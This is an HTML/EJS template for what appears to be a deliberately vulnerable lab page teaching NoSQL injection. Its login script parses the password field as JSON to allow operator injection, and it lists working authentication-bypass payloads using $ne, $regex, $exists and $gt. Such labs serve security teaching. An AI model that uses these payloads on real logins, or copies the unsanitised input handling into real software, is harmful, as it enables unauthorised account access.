<!DOCTYPE html>
<html>
<head>
    <title><%= title %></title>
    <link rel="stylesheet" href="/css/styles.css" type="text/css">
    <!-- bootstrap -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    <!-- poppins -->
    <link href='https://fonts.googleapis.com/css?family=Poppins' rel='stylesheet'>
    <!-- custom css -->
    <style>
        body {
            font-family: 'Poppins';
            background-color: black;
        }

    </style>
</head>
<body>
    <!-- <h1>Home</h1>
    <p>Welcome to the home page!</p> -->
    <%- include('partials/navbar') %>
    <!-- section: result -->
    <section id="result">
    </section>
    <!-- Section: Design Block -->
<section class="background-radial-gradient overflow-hidden">
  <style>
    .background-radial-gradient {
      background-color: hsl(218, 41%, 15%);
      background-image: radial-gradient(650px circle at 0% 0%,
          hsl(218, 41%, 35%) 15%,
          hsl(218, 41%, 30%) 35%,
          hsl(218, 41%, 20%) 75%,
          hsl(218, 41%, 19%) 80%,
          transparent 100%),
        radial-gradient(1250px circle at 100% 100%,
          hsl(218, 41%, 45%) 15%,
          hsl(218, 41%, 30%) 35%,
          hsl(218, 41%, 20%) 75%,
          hsl(218, 41%, 19%) 80%,
          transparent 100%);
    }

    #radius-shape-1 {
      height: 220px;
      width: 220px;
      top: -60px;
      left: -130px;
      background: radial-gradient(#44006b, #ad1fff);
      overflow: hidden;
    }

    #radius-shape-2 {
      border-radius: 38% 62% 63% 37% / 70% 33% 67% 30%;
      bottom: -60px;
      right: -110px;
      width: 300px;
      height: 300px;
      background: radial-gradient(#44006b, #ad1fff);
      overflow: hidden;
    }

    .bg-glass {
      background-color: hsla(0, 0%, 100%, 0.9) !important;
      backdrop-filter: saturate(200%) blur(25px);
    }
    #result {
      display:none;
    }
  </style>

  <div class="container px-4 py-5 px-md-5 text-center text-lg-start my-5">
    <div class="row gx-lg-5 align-items-center mb-5">
      <div class="col-lg-6 mb-5 mb-lg-0" style="z-index: 10">
        <h1 class="my-5 display-5 fw-bold ls-tight" style="color: hsl(218, 81%, 95%)">
          Learn <br />
          <span style="color: hsl(218, 81%, 75%)">NoSQL Injection</span>
        </h1>
        <p class="mb-4 opacity-70" style="color: hsl(218, 81%, 85%)">
          A NoSQL injection can allow attackers to bypass authentication, exfiltrate sensitive data, tamper with data on the database,
          or even compromise the database and the underlying server. Most NoSQL injection vulnerabilities occur because developers accept and 
          process user inputs without properly sanitizing them.
        </p>
      </div>

      <div class="col-lg-6 mb-5 mb-lg-0 position-relative">
        <div id="radius-shape-1" class="position-absolute rounded-circle shadow-5-strong"></div>
        <div id="radius-shape-2" class="position-absolute shadow-5-strong"></div>

        <div class="card bg-glass">
          <div class="card-body px-4 py-5 px-md-5">
            <form action="/user" method="POST">
              <!-- Email input -->
              <div class="form-outline mb-4">
                <input type="email" id="emailid" name="email" class="form-control"/>
                <label class="form-label" for="password">Email address</label>
              </div>
            
              <!-- Password input -->
              <div class="form-outline mb-4">
                <input type="password" id="password" class="form-control" name="password"/>
                <label class="form-label" for="password">Password</label>
              </div>
            
              <!-- Submit button -->
              <div class="text-center">
                <button type="submit" class="btn btn-primary btn-block mb-4 mx-auto" id="fetchData">
                  Login
                </button>
              </div>
            </form>
            
          </div>
        </div>
      </div>
    </div>
  </div>
</section>
<!-- Section: Design Block -->
<!-- section: learn more -->
<section>
  <div class="card bg-dark text-white">
    <div class="card-header">
      <h4>How to Use ?</h4>
    </div>
    <div class="card-body">
      <h5 class="card-title">Basic authentication bypass</h5>
      <p class="card-text">
        <pre>
          Using not equal ($ne) or greater ($gt)
          #in URL
          username[$ne]=toto&password[$ne]=toto
          username[$regex]=.*&password[$regex]=.*
          username[$exists]=true&password[$exists]=true

          #in JSON
          {"username": {"$ne": null}, "password": {"$ne": null} }
          {"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
          {"username": {"$gt": undefined}, "password": {"$gt": undefined} }
        </pre>
      </p>
      <a href="https://book.hacktricks.xyz/pentesting-web/nosql-injection" class="btn btn-primary">Read More</a>
    </div>
  </div>
</section>
<script>
  
  const fetchData = document.getElementById('fetchData');
  fetchData.addEventListener('click',(e) => {
    e.preventDefault();
    const email = document.getElementById('emailid').value;
    let password = document.getElementById('password').value;
    try {
      password = JSON.parse(password);
    } catch (error) {
      // console.warn(error);
    }
    console.log("login credentials:",email, password);
    let res = fetch('/user', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json'
    },
    body: JSON.stringify({
        email: email,
        password: password
    })
}).then((res) => {
    return res.json();
}
).then((data) => {
    console.table(data);
    const result = document.getElementById('result');
    result.style.display = "block";

    if(!data.user) {
      alert("User not found, Login failed!");
      result.innerHTML = `<div class="alert alert-danger" role="alert">
      <h4 class="alert-heading">Login Unsuccessful!</h4>
      <p>${data.message}</p>
      <hr>
      </div>`;
    } else {
      alert("Login Successfull!");
      result.innerHTML = `<div class="alert alert-success" role="alert">
      <h4 class="alert-heading">Login Successful!</h4>
      <p>${data.message}</p>
      <hr>
      </div>`;
    }
});
  })
</script>
</body>
</html>